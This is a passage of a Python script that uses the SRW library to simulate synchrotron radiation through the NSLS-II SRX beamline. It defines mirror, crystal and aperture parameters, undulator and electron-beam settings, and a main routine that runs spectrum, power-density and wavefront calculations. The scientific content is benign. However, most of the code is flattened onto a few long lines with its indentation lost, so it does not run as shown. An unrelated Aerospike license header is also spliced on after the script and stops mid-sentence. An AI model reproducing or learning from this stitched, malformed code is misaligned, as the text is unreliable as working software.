'KBV': # KBV: ellipsoidMirror 62.663m el.append(srwlib.SRWLOptMirEl( _p=v.op_KBV_p, _q=v.op_KBV_q, _ang_graz=v.op_KBV_ang, _size_tang=v.op_KBV_size_tang, _size_sag=v.op_KBV_size_sag, _nvx=v.op_KBV_nvx, _nvy=v.op_KBV_nvy, _nvz=v.op_KBV_nvz, _tvx=v.op_KBV_tvx, _tvy=v.op_KBV_tvy, _x=v.op_KBV_x, _y=v.op_KBV_y, )) 
pp.append(v.op_KBV_pp) elif el_name == 'KBV_KBH': # KBV_KBH: drift 62.663m el.append(srwlib.SRWLOptD( _L=v.op_KBV_KBH_L, )) pp.append(v.op_KBV_KBH_pp) elif el_name == 'KBH': # KBH: ellipsoidMirror 63.0m el.append(srwlib.SRWLOptMirEl( _p=v.op_KBH_p, _q=v.op_KBH_q, _ang_graz=v.op_KBH_ang, _size_tang=v.op_KBH_size_tang, _size_sag=v.op_KBH_size_sag, _nvx=v.op_KBH_nvx, _nvy=v.op_KBH_nvy, _nvz=v.op_KBH_nvz, _tvx=v.op_KBH_tvx, _tvy=v.op_KBH_tvy, _x=v.op_KBH_x, _y=v.op_KBH_y, )) pp.append(v.op_KBH_pp) elif el_name == 'KBH_At_Sample': # KBH_At_Sample: drift 63.0m el.append(srwlib.SRWLOptD( _L=v.op_KBH_At_Sample_L, )) pp.append(v.op_KBH_At_Sample_pp) elif el_name == 'At_Sample': # At_Sample: watch 63.3m pass pp.append(v.op_fin_pp) return srwlib.SRWLOptC(el, pp) varParam = srwl_bl.srwl_uti_ext_options([ ['name', 's', 'NSLS-II SRX beamline', 'simulation name'], #---Data Folder ['fdir', 's', '', 'folder (directory) name for reading-in input and saving output data files'], #---Electron Beam ['ebm_nm', 's', '', 'standard electron beam name'], ['ebm_nms', 's', '', 'standard electron beam name suffix: e.g. 
can be Day1, Final'], ['ebm_i', 'f', 0.5, 'electron beam current [A]'], ['ebm_e', 'f', 3.0, 'electron beam avarage energy [GeV]'], ['ebm_de', 'f', 0.0, 'electron beam average energy deviation [GeV]'], ['ebm_x', 'f', 0.0, 'electron beam initial average horizontal position [m]'], ['ebm_y', 'f', 0.0, 'electron beam initial average vertical position [m]'], ['ebm_xp', 'f', 0.0, 'electron beam initial average horizontal angle [rad]'], ['ebm_yp', 'f', 0.0, 'electron beam initial average vertical angle [rad]'], ['ebm_z', 'f', 0., 'electron beam initial average longitudinal position [m]'], ['ebm_dr', 'f', 0.0, 'electron beam longitudinal drift [m] to be performed before a required calculation'], ['ebm_ens', 'f', 0.00089, 'electron beam relative energy spread'], ['ebm_emx', 'f', 9e-10, 'electron beam horizontal emittance [m]'], ['ebm_emy', 'f', 8e-12, 'electron beam vertical emittance [m]'], # Definition of the beam through Twiss: ['ebm_betax', 'f', 1.84, 'horizontal beta-function [m]'], ['ebm_betay', 'f', 1.17, 'vertical beta-function [m]'], ['ebm_alphax', 'f', 0.0, 'horizontal alpha-function [rad]'], ['ebm_alphay', 'f', 0.0, 'vertical alpha-function [rad]'], ['ebm_etax', 'f', 0.0, 'horizontal dispersion function [m]'], ['ebm_etay', 'f', 0.0, 'vertical dispersion function [m]'], ['ebm_etaxp', 'f', 0.0, 'horizontal dispersion function derivative [rad]'], ['ebm_etayp', 'f', 0.0, 'vertical dispersion function derivative [rad]'], #---Undulator ['und_bx', 'f', 0.0, 'undulator horizontal peak magnetic field [T]'], ['und_by', 'f', 0.88770981, 'undulator vertical peak magnetic field [T]'], ['und_phx', 'f', 0.0, 'initial phase of the horizontal magnetic field [rad]'], ['und_phy', 'f', 0.0, 'initial phase of the vertical magnetic field [rad]'], ['und_b2e', '', '', 'estimate undulator fundamental photon energy (in [eV]) for the amplitude of sinusoidal magnetic field defined by und_b or und_bx, und_by', 'store_true'], ['und_e2b', '', '', 'estimate undulator field amplitude (in [T]) for 
the photon energy defined by w_e', 'store_true'], ['und_per', 'f', 0.02, 'undulator period [m]'], ['und_len', 'f', 2.500648, 'undulator length [m]'], ['und_zc', 'f', -1.25, 'undulator center longitudinal position [m]'], ['und_sx', 'i', 1, 'undulator horizontal magnetic field symmetry vs longitudinal position'], ['und_sy', 'i', -1, 'undulator vertical magnetic field symmetry vs longitudinal position'], ['und_g', 'f', 6.715, 'undulator gap [mm] (assumes availability of magnetic measurement or simulation data)'], ['und_ph', 'f', 0.0, 'shift of magnet arrays [mm] for which the field should be set up'], ['und_mdir', 's', '', 'name of magnetic measurements sub-folder'], ['und_mfs', 's', '', 'name of magnetic measurements for different gaps summary file'], #---Calculation Types # Electron Trajectory ['tr', '', '', 'calculate electron trajectory', 'store_true'], ['tr_cti', 'f', 0.0, 'initial time moment (c*t) for electron trajectory calculation [m]'], ['tr_ctf', 'f', 0.0, 'final time moment (c*t) for electron trajectory calculation [m]'], ['tr_np', 'f', 10000, 'number of points for trajectory calculation'], ['tr_mag', 'i', 2, 'magnetic field to be used for trajectory calculation: 1- approximate, 2- accurate'], ['tr_fn', 's', 'res_trj.dat', 'file name for saving calculated trajectory data'], ['tr_pl', 's', '', 'plot the resulting trajectiry in graph(s): ""- dont plot, otherwise the string should list the trajectory components to plot'], #Single-Electron Spectrum vs Photon Energy ['ss', '', '', 'calculate single-e spectrum vs photon energy', 'store_true'], ['ss_ei', 'f', 100.0, 'initial photon energy [eV] for single-e spectrum vs photon energy calculation'], ['ss_ef', 'f', 20000.0, 'final photon energy [eV] for single-e spectrum vs photon energy calculation'], ['ss_ne', 'i', 10000, 'number of points vs photon energy for single-e spectrum vs photon energy calculation'], ['ss_x', 'f', 0.0, 'horizontal position [m] for single-e spectrum vs photon energy calculation'], ['ss_y', 
'f', 0.0, 'vertical position [m] for single-e spectrum vs photon energy calculation'], ['ss_meth', 'i', 1, 'method to use for single-e spectrum vs photon energy calculation: 0- "manual", 1- "auto-undulator", 2- "auto-wiggler"'], ['ss_prec', 'f', 0.01, 'relative precision for single-e spectrum vs photon energy calculation (nominal value is 0.01)'], ['ss_pol', 'i', 6, 'polarization component to extract after spectrum vs photon energy calculation: 0- Linear Horizontal, 1- Linear Vertical, 2- Linear 45 degrees, 3- Linear 135 degrees, 4- Circular Right, 5- Circular Left, 6- Total'], ['ss_mag', 'i', 2, 'magnetic field to be used for single-e spectrum vs photon energy calculation: 1- approximate, 2- accurate'], ['ss_ft', 's', 'f', 'presentation/domain: "f"- frequency (photon energy), "t"- time'], ['ss_u', 'i', 1, 'electric field units: 0- arbitrary, 1- sqrt(Phot/s/0.1%bw/mm^2), 2- sqrt(J/eV/mm^2) or sqrt(W/mm^2), depending on representation (freq. or time)'], ['ss_fn', 's', 'res_spec_se.dat', 'file name for saving calculated single-e spectrum vs photon energy'], ['ss_pl', 's', '', 'plot the resulting single-e spectrum in a graph: ""- dont plot, "e"- show plot vs photon energy'], #Multi-Electron Spectrum vs Photon Energy (taking into account e-beam emittance, energy spread and collection aperture size) ['sm', '', '', 'calculate multi-e spectrum vs photon energy', 'store_true'], ['sm_ei', 'f', 100.0, 'initial photon energy [eV] for multi-e spectrum vs photon energy calculation'], ['sm_ef', 'f', 20000.0, 'final photon energy [eV] for multi-e spectrum vs photon energy calculation'], ['sm_ne', 'i', 10000, 'number of points vs photon energy for multi-e spectrum vs photon energy calculation'], ['sm_x', 'f', 0.0, 'horizontal center position [m] for multi-e spectrum vs photon energy calculation'], ['sm_rx', 'f', 0.001, 'range of horizontal position / horizontal aperture size [m] for multi-e spectrum vs photon energy calculation'], ['sm_nx', 'i', 1, 'number of points vs horizontal 
position for multi-e spectrum vs photon energy calculation'], ['sm_y', 'f', 0.0, 'vertical center position [m] for multi-e spectrum vs photon energy calculation'], ['sm_ry', 'f', 0.001, 'range of vertical position / vertical aperture size [m] for multi-e spectrum vs photon energy calculation'], ['sm_ny', 'i', 1, 'number of points vs vertical position for multi-e spectrum vs photon energy calculation'], ['sm_mag', 'i', 1, 'magnetic field to be used for calculation of multi-e spectrum spectrum or intensity distribution: 1- approximate, 2- accurate'], ['sm_hi', 'i', 1, 'initial UR spectral harmonic to be taken into account for multi-e spectrum vs photon energy calculation'], ['sm_hf', 'i', 15, 'final UR spectral harmonic to be taken into account for multi-e spectrum vs photon energy calculation'], ['sm_prl', 'f', 1.0, 'longitudinal integration precision parameter for multi-e spectrum vs photon energy calculation'], ['sm_pra', 'f', 1.0, 'azimuthal integration precision parameter for multi-e spectrum vs photon energy calculation'], ['sm_meth', 'i', -1, 'method to use for spectrum vs photon energy calculation in case of arbitrary input magnetic field: 0- "manual", 1- "auto-undulator", 2- "auto-wiggler", -1- dont use this accurate integration method (rather use approximate if possible)'], ['sm_prec', 'f', 0.01, 'relative precision for spectrum vs photon energy calculation in case of arbitrary input magnetic field (nominal value is 0.01)'], ['sm_nm', 'i', 1, 'number of macro-electrons for calculation of spectrum in case of arbitrary input magnetic field'], ['sm_na', 'i', 5, 'number of macro-electrons to average on each node at parallel (MPI-based) calculation of spectrum in case of arbitrary input magnetic field'], ['sm_ns', 'i', 5, 'saving periodicity (in terms of macro-electrons) for intermediate intensity at calculation of multi-electron spectrum in case of arbitrary input magnetic field'], ['sm_type', 'i', 1, 'calculate flux (=1) or flux per unit surface (=2)'], 
['sm_pol', 'i', 6, 'polarization component to extract after calculation of multi-e flux or intensity: 0- Linear Horizontal, 1- Linear Vertical, 2- Linear 45 degrees, 3- Linear 135 degrees, 4- Circular Right, 5- Circular Left, 6- Total'], ['sm_rm', 'i', 1, 'method for generation of pseudo-random numbers for e-beam phase-space integration: 1- standard pseudo-random number generator, 2- Halton sequences, 3- LPtau sequences (to be implemented)'], ['sm_fn', 's', 'res_spec_me.dat', 'file name for saving calculated milti-e spectrum vs photon energy'], ['sm_pl', 's', '', 'plot the resulting spectrum-e spectrum in a graph: ""- dont plot, "e"- show plot vs photon energy'], #to add options for the multi-e calculation from "accurate" magnetic field #Power Density Distribution vs horizontal and vertical position ['pw', '', '', 'calculate SR power density distribution', 'store_true'], ['pw_x', 'f', 0.0, 'central horizontal position [m] for calculation of power density distribution vs horizontal and vertical position'], ['pw_rx', 'f', 0.025, 'range of horizontal position [m] for calculation of power density distribution vs horizontal and vertical position'], ['pw_nx', 'i', 100, 'number of points vs horizontal position for calculation of power density distribution'], ['pw_y', 'f', 0.0, 'central vertical position [m] for calculation of power density distribution vs horizontal and vertical position'], ['pw_ry', 'f', 0.025, 'range of vertical position [m] for calculation of power density distribution vs horizontal and vertical position'], ['pw_ny', 'i', 100, 'number of points vs vertical position for calculation of power density distribution'], ['pw_pr', 'f', 1.0, 'precision factor for calculation of power density distribution'], ['pw_meth', 'i', 1, 'power density computation method (1- "near field", 2- "far field")'], ['pw_zst', 'f', 0., 'initial longitudinal position along electron trajectory of power density distribution (effective if pow_sst < pow_sfi)'], ['pw_zfi', 'f', 0., 
'final longitudinal position along electron trajectory of power density distribution (effective if pow_sst < pow_sfi)'], ['pw_mag', 'i', 2, 'magnetic field to be used for power density calculation: 1- approximate, 2- accurate'], ['pw_fn', 's', 'res_pow.dat', 'file name for saving calculated power density distribution'], ['pw_pl', 's', '', 'plot the resulting power density distribution in a graph: ""- dont plot, "x"- vs horizontal position, "y"- vs vertical position, "xy"- vs horizontal and vertical position'], #Single-Electron Intensity distribution vs horizontal and vertical position ['si', '', '', 'calculate single-e intensity distribution (without wavefront propagation through a beamline) vs horizontal and vertical position', 'store_true'], #Single-Electron Wavefront Propagation ['ws', '', '', 'calculate single-electron (/ fully coherent) wavefront propagation', 'store_true'], #Multi-Electron (partially-coherent) Wavefront Propagation ['wm', '', '', 'calculate multi-electron (/ partially coherent) wavefront propagation', 'store_true'], ['w_e', 'f', 8000.0, 'photon energy [eV] for calculation of intensity distribution vs horizontal and vertical position'], ['w_ef', 'f', -1.0, 'final photon energy [eV] for calculation of intensity distribution vs horizontal and vertical position'], ['w_ne', 'i', 1, 'number of points vs photon energy for calculation of intensity distribution'], ['w_x', 'f', 0.0, 'central horizontal position [m] for calculation of intensity distribution'], ['w_rx', 'f', 0.0025, 'range of horizontal position [m] for calculation of intensity distribution'], ['w_nx', 'i', 100, 'number of points vs horizontal position for calculation of intensity distribution'], ['w_y', 'f', 0.0, 'central vertical position [m] for calculation of intensity distribution vs horizontal and vertical position'], ['w_ry', 'f', 0.0013, 'range of vertical position [m] for calculation of intensity distribution vs horizontal and vertical position'], ['w_ny', 'i', 100, 'number of 
points vs vertical position for calculation of intensity distribution'], ['w_smpf', 'f', 0.1, 'sampling factor for calculation of intensity distribution vs horizontal and vertical position'], ['w_meth', 'i', 1, 'method to use for calculation of intensity distribution vs horizontal and vertical position: 0- "manual", 1- "auto-undulator", 2- "auto-wiggler"'], ['w_prec', 'f', 0.01, 'relative precision for calculation of intensity distribution vs horizontal and vertical position'], ['w_u', 'i', 1, 'electric field units: 0- arbitrary, 1- sqrt(Phot/s/0.1%bw/mm^2), 2- sqrt(J/eV/mm^2) or sqrt(W/mm^2), depending on representation (freq. or time)'], ['si_pol', 'i', 6, 'polarization component to extract after calculation of intensity distribution: 0- Linear Horizontal, 1- Linear Vertical, 2- Linear 45 degrees, 3- Linear 135 degrees, 4- Circular Right, 5- Circular Left, 6- Total'], ['si_type', 'i', 0, 'type of a characteristic to be extracted after calculation of intensity distribution: 0- Single-Electron Intensity, 1- Multi-Electron Intensity, 2- Single-Electron Flux, 3- Multi-Electron Flux, 4- Single-Electron Radiation Phase, 5- Re(E): Real part of Single-Electron Electric Field, 6- Im(E): Imaginary part of Single-Electron Electric Field, 7- Single-Electron Intensity, integrated over Time or Photon Energy'], ['w_mag', 'i', 2, 'magnetic field to be used for calculation of intensity distribution vs horizontal and vertical position: 1- approximate, 2- accurate'], ['si_fn', 's', 'res_int_se.dat', 'file name for saving calculated single-e intensity distribution (without wavefront propagation through a beamline) vs horizontal and vertical position'], ['si_pl', 's', '', 'plot the input intensity distributions in graph(s): ""- dont plot, "x"- vs horizontal position, "y"- vs vertical position, "xy"- vs horizontal and vertical position'], ['ws_fni', 's', 'res_int_pr_se.dat', 'file name for saving propagated single-e intensity distribution vs horizontal and vertical position'], 
['ws_pl', 's', '', 'plot the resulting intensity distributions in graph(s): ""- dont plot, "x"- vs horizontal position, "y"- vs vertical position, "xy"- vs horizontal and vertical position'], ['wm_nm', 'i', 1000, 'number of macro-electrons (coherent wavefronts) for calculation of multi-electron wavefront propagation'], ['wm_na', 'i', 5, 'number of macro-electrons (coherent wavefronts) to average on each node for parallel (MPI-based) calculation of multi-electron wavefront propagation'], ['wm_ns', 'i', 5, 'saving periodicity (in terms of macro-electrons / coherent wavefronts) for intermediate intensity at multi-electron wavefront propagation calculation'], ['wm_ch', 'i', 0, 'type of a characteristic to be extracted after calculation of multi-electron wavefront propagation: #0- intensity (s0); 1- four Stokes components; 2- mutual intensity cut vs x; 3- mutual intensity cut vs y; 40- intensity(s0), mutual intensity cuts and degree of coherence vs X & Y'], ['wm_ap', 'i', 0, 'switch specifying representation of the resulting Stokes parameters: coordinate (0) or angular (1)'], ['wm_x0', 'f', 0, 'horizontal center position for mutual intensity cut calculation'], ['wm_y0', 'f', 0, 'vertical center position for mutual intensity cut calculation'], ['wm_ei', 'i', 0, 'integration over photon energy is required (1) or not (0); if the integration is required, the limits are taken from w_e, w_ef'], ['wm_rm', 'i', 1, 'method for generation of pseudo-random numbers for e-beam phase-space integration: 1- standard pseudo-random number generator, 2- Halton sequences, 3- LPtau sequences (to be implemented)'], ['wm_am', 'i', 0, 'multi-electron integration approximation method: 0- no approximation (use the standard 5D integration method), 1- integrate numerically only over e-beam energy spread and use convolution to treat transverse emittance'], ['wm_fni', 's', 'res_int_pr_me.dat', 'file name for saving propagated multi-e intensity distribution vs horizontal and vertical position'], #to 
add options ['op_r', 'f', 20.0, 'longitudinal position of the first optical element [m]'], # Former appParam: ['rs_type', 's', 't', 'source type, (u) idealized undulator, (t), tabulated undulator, (m) multipole, (g) gaussian beam'], #---Beamline optics: # S0: aperture ['op_S0_shape', 's', 'r', 'shape'], ['op_S0_Dx', 'f', 0.002, 'horizontalSize'], ['op_S0_Dy', 'f', 0.001, 'verticalSize'], ['op_S0_x', 'f', 0.0, 'horizontalOffset'], ['op_S0_y', 'f', 0.0, 'verticalOffset'], # S0_HFM: drift ['op_S0_HFM_L', 'f', 1.081, 'length'], # HFM: sphericalMirror ['op_HFM_hfn', 's', 'None', 'heightProfileFile'], ['op_HFM_dim', 's', 'x', 'orientation'], ['op_HFM_r', 'f', 8871.45, 'radius'], ['op_HFM_size_tang', 'f', 0.95, 'tangentialSize'], ['op_HFM_size_sag', 'f', 0.005, 'sagittalSize'], ['op_HFM_ang', 'f', 0.0025, 'grazingAngle'], ['op_HFM_nvx', 'f', 0.999996875002, 'normalVectorX'], ['op_HFM_nvy', 'f', 0.0, 'normalVectorY'], ['op_HFM_nvz', 'f', -0.00249999739583, 'normalVectorZ'], ['op_HFM_tvx', 'f', 0.00249999739583, 'tangentialVectorX'], ['op_HFM_tvy', 'f', 0.0, 'tangentialVectorY'], ['op_HFM_amp_coef', 'f', 1.0, 'heightAmplification'], ['op_HFM_x', 'f', 0.0, 'horizontalOffset'], ['op_HFM_y', 'f', 0.0, 'verticalOffset'], # HFM_S1: drift ['op_HFM_S1_L', 'f', 1.407, 'length'], # S1: aperture ['op_S1_shape', 's', 'r', 'shape'], ['op_S1_Dx', 'f', 0.0024, 'horizontalSize'], ['op_S1_Dy', 'f', 0.0015, 'verticalSize'], ['op_S1_x', 'f', 0.0, 'horizontalOffset'], ['op_S1_y', 'f', 0.0, 'verticalOffset'], # S1_DCM_C1: drift ['op_S1_DCM_C1_L', 'f', 0.781, 'length'], # DCM_C1: crystal ['op_DCM_C1_hfn', 's', '', 'heightProfileFile'], ['op_DCM_C1_dim', 's', 'x', 'orientation'], ['op_DCM_C1_d_sp', 'f', 3.13557135638, 'dSpacing'], ['op_DCM_C1_psi0r', 'f', -1.53227839905e-05, 'psi0r'], ['op_DCM_C1_psi0i', 'f', 3.59410775406e-07, 'psi0i'], ['op_DCM_C1_psiHr', 'f', -8.10706354484e-06, 'psiHr'], ['op_DCM_C1_psiHi', 'f', 2.50931132347e-07, 'psiHi'], ['op_DCM_C1_psiHBr', 'f', -8.10706354484e-06, 
'psiHBr'], ['op_DCM_C1_psiHBi', 'f', 2.50931132347e-07, 'psiHBi'], ['op_DCM_C1_tc', 'f', 0.01, 'crystalThickness'], ['op_DCM_C1_ang_as', 'f', 0.0, 'asymmetryAngle'], ['op_DCM_C1_nvx', 'f', -0.968973817886, 'nvx'], ['op_DCM_C1_nvy', 'f', 2.59635532439e-08, 'nvy'], ['op_DCM_C1_nvz', 'f', -0.247163387763, 'nvz'], ['op_DCM_C1_tvx', 'f', -0.247163387763, 'tvx'], ['op_DCM_C1_tvy', 'f', 6.62271741473e-09, 'tvy'], ['op_DCM_C1_ang', 'f', 0.249751717635, 'grazingAngle'], ['op_DCM_C1_amp_coef', 'f', 1.0, 'heightAmplification'], # DCM_C2: crystal ['op_DCM_C2_hfn', 's', '', 'heightProfileFile'], ['op_DCM_C2_dim', 's', 'x', 'orientation'], ['op_DCM_C2_d_sp', 'f', 3.13557135638, 'dSpacing'], ['op_DCM_C2_psi0r', 'f', -1.53227839905e-05, 'psi0r'], ['op_DCM_C2_psi0i', 'f', 3.59410775406e-07, 'psi0i'], ['op_DCM_C2_psiHr', 'f', -8.10706354484e-06, 'psiHr'], ['op_DCM_C2_psiHi', 'f', 2.50931132347e-07, 'psiHi'], ['op_DCM_C2_psiHBr', 'f', -8.10706354484e-06, 'psiHBr'], ['op_DCM_C2_psiHBi', 'f', 2.50931132347e-07, 'psiHBi'], ['op_DCM_C2_tc', 'f', 0.01, 'crystalThickness'], ['op_DCM_C2_ang_as', 'f', 0.0, 'asymmetryAngle'], ['op_DCM_C2_nvx', 'f', 0.968973817886, 'nvx'], ['op_DCM_C2_nvy', 'f', 0.0, 'nvy'], ['op_DCM_C2_nvz', 'f', -0.247163387763, 'nvz'], ['op_DCM_C2_tvx', 'f', 0.247163387763, 'tvx'], ['op_DCM_C2_tvy', 'f', 0.0, 'tvy'], ['op_DCM_C2_ang', 'f', 0.249751717635, 'grazingAngle'], ['op_DCM_C2_amp_coef', 'f', 1.0, 'heightAmplification'], # DCM_C2_At_BPM1: drift ['op_DCM_C2_At_BPM1_L', 'f', 2.2416, 'length'], # At_BPM1_Before_SSA: drift ['op_At_BPM1_Before_SSA_L', 'f', 11.9668, 'length'], # SSA: aperture ['op_SSA_shape', 's', 'r', 'shape'], ['op_SSA_Dx', 'f', 5e-05, 'horizontalSize'], ['op_SSA_Dy', 'f', 0.003, 'verticalSize'], ['op_SSA_x', 'f', 0.0, 'horizontalOffset'], ['op_SSA_y', 'f', 0.0, 'verticalOffset'], # SSA_AKB: drift ['op_SSA_AKB_L', 'f', 11.8308, 'length'], # AKB: aperture ['op_AKB_shape', 's', 'r', 'shape'], ['op_AKB_Dx', 'f', 0.003, 'horizontalSize'], ['op_AKB_Dy', 'f', 
0.000875, 'verticalSize'], ['op_AKB_x', 'f', 0.0, 'horizontalOffset'], ['op_AKB_y', 'f', 0.0, 'verticalOffset'], # AKB_KBV: drift ['op_AKB_KBV_L', 'f', 0.175, 'length'], # KBV: ellipsoidMirror ['op_KBV_hfn', 's', '', 'heightProfileFile'], ['op_KBV_dim', 's', 'x', 'orientation'], ['op_KBV_p', 'f', 63.913, 'firstFocusLength'], ['op_KBV_q', 'f', 0.637, 'focalLength'], ['op_KBV_ang', 'f', 0.0025, 'grazingAngle'], ['op_KBV_amp_coef', 'f', 1.0, 'heightAmplification'], ['op_KBV_size_tang', 'f', 0.35, 'tangentialSize'], ['op_KBV_size_sag', 'f', 0.003, 'sagittalSize'], ['op_KBV_nvx', 'f', 0.0, 'normalVectorX'], ['op_KBV_nvy', 'f', 0.999996875002, 'normalVectorY'], ['op_KBV_nvz', 'f', -0.00249999739583, 'normalVectorZ'], ['op_KBV_tvx', 'f', 0.0, 'tangentialVectorX'], ['op_KBV_tvy', 'f', -0.00249999739583, 'tangentialVectorY'], ['op_KBV_x', 'f', 0.0, 'horizontalOffset'], ['op_KBV_y', 'f', 0.0, 'verticalOffset'], # KBV_KBH: drift ['op_KBV_KBH_L', 'f', 0.337, 'length'], # KBH: ellipsoidMirror ['op_KBH_hfn', 's', '', 'heightProfileFile'], ['op_KBH_dim', 's', 'x', 'orientation'], ['op_KBH_p', 'f', 12.3428, 'firstFocusLength'], ['op_KBH_q', 'f', 0.3, 'focalLength'], ['op_KBH_ang', 'f', 0.0025, 'grazingAngle'], ['op_KBH_amp_coef', 'f', 1.0, 'heightAmplification'], ['op_KBH_size_tang', 'f', 0.3, 'tangentialSize'], ['op_KBH_size_sag', 'f', 0.003, 'sagittalSize'], ['op_KBH_nvx', 'f', 0.999996875002, 'normalVectorX'], ['op_KBH_nvy', 'f', 0.0, 'normalVectorY'], ['op_KBH_nvz', 'f', -0.00249999739583, 'normalVectorZ'], ['op_KBH_tvx', 'f', -0.00249999739583, 'tangentialVectorX'], ['op_KBH_tvy', 'f', 0.0, 'tangentialVectorY'], ['op_KBH_x', 'f', 0.0, 'horizontalOffset'], ['op_KBH_y', 'f', 0.0, 'verticalOffset'], # KBH_At_Sample: drift ['op_KBH_At_Sample_L', 'f', 0.3, 'length'], #---Propagation parameters ['op_S0_pp', 'f', [0, 0, 1.0, 0, 0, 1.1, 7.0, 1.3, 10.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'S0'], ['op_S0_HFM_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0], 'S0_HFM'], ['op_HFM_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'HFM'], ['op_HFM_S1_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'HFM_S1'], ['op_S1_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'S1'], ['op_S1_DCM_C1_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'S1_DCM_C1'], ['op_DCM_C1_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'DCM_C1'], ['op_DCM_C2_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'DCM_C2'], ['op_DCM_C2_At_BPM1_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'DCM_C2_At_BPM1'], ['op_At_BPM1_Before_SSA_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'At_BPM1_Before_SSA'], ['op_SSA_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'SSA'], ['op_SSA_AKB_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'SSA_AKB'], ['op_AKB_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'AKB'], ['op_AKB_KBV_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'AKB_KBV'], ['op_KBV_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'KBV'], ['op_KBV_KBH_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'KBV_KBH'], ['op_KBH_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'KBH'], ['op_KBH_At_Sample_pp', 'f', [0, 0, 1.0, 4, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'KBH_At_Sample'], ['op_fin_pp', 'f', [0, 0, 1.0, 0, 1, 0.5, 1.0, 0.2, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'final post-propagation (resize) parameters'], #[ 0]: 
Auto-Resize (1) or not (0) Before propagation #[ 1]: Auto-Resize (1) or not (0) After propagation #[ 2]: Relative Precision for propagation with Auto-Resizing (1. is nominal) #[ 3]: Allow (1) or not (0) for semi-analytical treatment of the quadratic (leading) phase terms at the propagation #[ 4]: Do any Resizing on Fourier side, using FFT, (1) or not (0) #[ 5]: Horizontal Range modification factor at Resizing (1. means no modification) #[ 6]: Horizontal Resolution modification factor at Resizing #[ 7]: Vertical Range modification factor at Resizing #[ 8]: Vertical Resolution modification factor at Resizing #[ 9]: Type of wavefront Shift before Resizing (not yet implemented) #[10]: New Horizontal wavefront Center position after Shift (not yet implemented) #[11]: New Vertical wavefront Center position after Shift (not yet implemented) #[12]: Optional: Orientation of the Output Optical Axis vector in the Incident Beam Frame: Horizontal Coordinate #[13]: Optional: Orientation of the Output Optical Axis vector in the Incident Beam Frame: Vertical Coordinate #[14]: Optional: Orientation of the Output Optical Axis vector in the Incident Beam Frame: Longitudinal Coordinate #[15]: Optional: Orientation of the Horizontal Base vector of the Output Frame in the Incident Beam Frame: Horizontal Coordinate #[16]: Optional: Orientation of the Horizontal Base vector of the Output Frame in the Incident Beam Frame: Vertical Coordinate ]) def setup_magnetic_measurement_files(filename, v): import os import re import zipfile z = zipfile.ZipFile(filename) z.extractall() for f in z.namelist(): if re.search(r'\.txt', f): v.und_mfs = os.path.basename(f) v.und_mdir = os.path.dirname(f) or './' return raise RuntimeError('missing magnetic measurement index *.txt file') def main(): v = srwl_bl.srwl_uti_parse_options(varParam, use_sys_argv=True) setup_magnetic_measurement_files("magn_meas_srx.zip", v) op = set_optics(v) v.ss = True v.ss_pl = 'e' v.sm = True v.sm_pl = 'e' v.pw = True v.pw_pl = 
'xy' v.si = True v.si_pl = 'xy' v.tr = True v.tr_pl = 'xz' v.ws = True v.ws_pl = 'xy' mag = None if v.rs_type == 'm': mag = srwlib.SRWLMagFldC() mag.arXc.append(0) mag.arYc.append(0) mag.arMagFld.append(srwlib.SRWLMagFldM(v.mp_field, v.mp_order, v.mp_distribution, v.mp_len)) mag.arZc.append(v.mp_zc) srwl_bl.SRWLBeamline(_name=v.name, _mag_approx=mag).calc_all(v, op) main()
# Copyright 2019 Aerospike, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
